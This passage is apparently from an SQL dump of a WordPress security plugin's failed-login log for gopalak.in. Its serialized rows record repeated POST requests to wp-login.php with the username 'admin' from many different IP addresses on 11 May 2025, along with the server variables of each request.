Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50672\";s:11:\"REMOTE_ADDR\";s:13:\"85.13.217.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746946797.021373;s:12:\"REQUEST_TIME\";i:1746946797;}}','85.13.217.246',0,'2025-05-11 12:29:58','1970-01-01 00:00:00'),(95457,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56262\";s:11:\"REMOTE_ADDR\";s:12:\"46.245.76.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746947175.7820189;s:12:\"REQUEST_TIME\";i:1746947175;}}','46.245.76.50',0,'2025-05-11 12:36:17','1970-01-01 00:00:00'),(95458,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59442\";s:11:\"REMOTE_ADDR\";s:12:\"69.57.162.26\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746947549.771096;s:12:\"REQUEST_TIME\";i:1746947549;}}','69.57.162.26',0,'2025-05-11 12:42:31','1970-01-01 00:00:00'),(95459,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46798\";s:11:\"REMOTE_ADDR\";s:12:\"69.57.162.20\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746947927.1029291;s:12:\"REQUEST_TIME\";i:1746947927;}}','69.57.162.20',0,'2025-05-11 12:48:48','1970-01-01 00:00:00'),(95460,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42876\";s:11:\"REMOTE_ADDR\";s:13:\"103.72.97.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746948304.603606;s:12:\"REQUEST_TIME\";i:1746948304;}}','103.72.97.210',0,'2025-05-11 12:55:06','1970-01-01 00:00:00'),(95461,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40268\";s:11:\"REMOTE_ADDR\";s:12:\"68.183.145.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746948686.3490839;s:12:\"REQUEST_TIME\";i:1746948686;}}','68.183.145.0',0,'2025-05-11 13:01:28','1970-01-01 00:00:00'),(95462,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50424\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.109\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746949071.364435;s:12:\"REQUEST_TIME\";i:1746949071;}}','162.0.229.109',0,'2025-05-11 13:07:53','1970-01-01 00:00:00'),(95463,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58142\";s:11:\"REMOTE_ADDR\";s:15:\"103.106.104.116\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746949514.721184;s:12:\"REQUEST_TIME\";i:1746949514;}}','103.106.104.116',0,'2025-05-11 13:15:16','1970-01-01 00:00:00'),(95464,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47416\";s:11:\"REMOTE_ADDR\";s:13:\"51.178.81.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746949957.193624;s:12:\"REQUEST_TIME\";i:1746949957;}}','51.178.81.248',0,'2025-05-11 13:22:38','1970-01-01 00:00:00'),(95465,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41616\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.141.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746950407.7897241;s:12:\"REQUEST_TIME\";i:1746950407;}}','66.29.141.59',0,'2025-05-11 13:30:09','1970-01-01 00:00:00'),(95466,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47616\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.229.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746950859.3506229;s:12:\"REQUEST_TIME\";i:1746950859;}}','162.0.229.50',0,'2025-05-11 13:37:41','1970-01-01 